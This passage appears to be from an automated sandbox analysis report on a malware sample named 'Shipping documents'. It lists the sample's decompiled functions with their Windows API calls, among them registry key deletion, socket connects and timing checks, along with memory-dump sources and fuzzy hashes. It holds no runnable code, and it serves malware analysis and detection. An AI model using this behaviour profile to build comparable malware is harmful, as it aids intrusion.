                                                                                                          • API String ID: 2832842796-0
                                                                                                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                          Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2095303065-0
                                                                                                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                          Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 861336768-0
                                                                                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                          Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 00449598
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1856069659-0
                                                                                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                          Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                          • TrackPopupMenuEx.USER32(01936410,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1300944170-0
                                                                                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                          Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1822080540-0
                                                                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                          Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 659298297-0
                                                                                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                          Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                          Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                          • _wcslen.LIBCMT ref: 004458FB
                                                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3087257052-0
                                                                                                          • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                          • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                          Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 245547762-0
                                                                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                          Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 2338827641-0
                                                                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                          Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 2875609808-0
                                                                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                          Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                          Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                          • String ID:
                                                                                                          • API String ID: 4023252218-0
                                                                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                          Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
